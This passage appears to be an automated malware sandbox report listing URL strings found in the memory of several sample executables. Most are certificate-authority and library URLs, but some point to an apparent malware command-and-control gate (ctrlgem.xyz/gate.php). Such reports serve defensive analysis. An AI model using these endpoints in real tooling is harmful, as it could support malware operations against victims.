                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                      Source: trano1221.exe, 00000023.00000003.1586024618.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctrlgem.xyz/gate.php
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctrlgem.xyz/gate.phpMN
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctrlgem.xyz/request
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctrlgem.xyz/request-N
                                      Source: trano1221.exe, 0000002A.00000002.1950520854.000001E16C380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                                      Source: trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com
                                      Source: trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                      Source: trano1221.exe, 0000002A.00000003.1839066325.000001E16BB73000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1947614092.000001E16BB74000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806684147.000001E16BB72000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1831815877.000001E16BB73000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1889510027.000001E16BB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1822821086.000001E16B5FD000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883429141.000001E16BB5C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807329895.000001E16B5F1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1904737697.000001E16BB65000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815572881.000001E16B5F2000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807091152.000001E16BB58000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835977069.000001E16B60B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1823085657.000001E16BB5C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1811187330.000001E16BB5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                      Source: trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832695924.000001E16B9ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
                                      Source: powershell.exe, 00000019.00000002.1600308325.00000000058D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                      Source: trano1221.exe, 0000002A.00000002.1942451950.000001E16B56C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839847199.000001E16C654000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1586024618.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1586024618.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                      Source: trano1221.exe, 0000002A.00000003.1683030296.000001E16B67B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1683030296.000001E16B58E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1672685606.000001E16B53F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
                                      Source: powershell.exe, 0000001D.00000002.4028270818.000001D88022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946800540.000001E16BB42000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1811511333.000001E16BC7C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816958267.000001E16B6D6000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807329895.000001E16B5F1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1895673208.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779497201.000001E16BC70000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891690088.000001E16B6D7000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1770432200.000001E16BC53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816958267.000001E16B6D6000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807329895.000001E16B5F1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891690088.000001E16B6D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/c
                                      Source: trano1221.exe, 0000002A.00000002.1946800540.000001E16BB42000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1895673208.000001E16BB41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/i%;
                                      Source: powershell.exe, 00000019.00000002.1586419592.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.4028270818.000001D880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                      Source: trano1221.exe, 0000002A.00000002.1970356972.000001E16CDD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883429141.000001E16BB5C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1904737697.000001E16BB65000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807091152.000001E16BB58000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1828305886.000001E16BA84000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946084154.000001E16BA86000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1823085657.000001E16BB5C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816159571.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 